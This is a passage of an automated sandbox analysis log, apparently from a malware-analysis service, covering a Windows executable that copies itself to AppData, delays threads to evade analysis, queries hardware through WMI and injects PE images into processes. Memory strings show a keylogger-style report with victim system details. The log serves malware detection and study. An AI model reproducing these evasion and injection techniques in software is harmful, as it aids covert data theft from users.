                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -597110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -597000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -596891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -596766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -596643s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -596516s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -596371s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -596250s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -596140s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -596032s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -595922s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -595813s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -595688s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -595563s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -595438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -595313s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -595204s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -595079s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -594954s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -594829s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -594704s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -594579s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -594454s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -594329s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -594204s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -594079s >= -30000s
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 599885Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 599514Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 599382Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 599208Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 599092Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598969Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598859Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598750Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598640Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598422Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598312Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597969Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597859Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597750Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597624Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597515Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597406Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597296Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597187Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 597078Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596878Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596764Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596655Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596531Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596422Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596312Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595982Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595873Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595750Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595640Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595422Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 595094Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594875Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594765Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594546Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594436Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594309Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594193Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594071Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 593953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599886Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599780Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598794Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598465Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598347Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597452Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596794Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596140Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595692Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594790Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594677Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599766
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599657
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599532
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599407
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599282
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599157
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599047
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598932
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598813
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598694
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598579
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598454
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598329
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598219
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598094
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597984
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597766
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597656
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597219
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596891
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596766
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596643
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596516
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596371
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596250
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596140
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596032
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595922
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595813
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595688
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595563
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595438
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595313
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595204
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595079
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594954
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594829
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594704
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594579
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594454
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594329
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594204
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594079
                    Source: sgxIb.exe, 00000006.00000002.1922419879.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
                    Source: rMT103_126021720924.exe, 00000002.00000002.4168815105.0000000001107000.00000004.00000020.00020000.00000000.sdmp, sgxIb.exe, 0000000B.00000002.4167820395.0000000000A3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeMemory written: C:\Users\user\Desktop\rMT103_126021720924.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory written: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeProcess created: C:\Users\user\Desktop\rMT103_126021720924.exe "C:\Users\user\Desktop\rMT103_126021720924.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002BFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002BFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q9<b>[ Program Manager]</b> (01/11/2024 00:37:23)<br>{Win}rTHcq
                    Source: rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002BFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q3<b>[ Program Manager]</b> (01/11/2024 00:37:23)<br>
                    Source: rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002BFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,
                    Source: rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002BFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q8<b>[ Program Manager]</b> (01/11/2024 00:37:23)<br>{Win}THcq
                    Source: rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002C5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <html>Time: 11/29/2024 18:53:11<br>User Name: user<br>Computer Name: 494126<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 173.254.250.77<br><hr><b>[ Program Manager]</b> (01/11/2024 00:37:23)<br>{Win}r</html>
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Users\user\Desktop\rMT103_126021720924.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
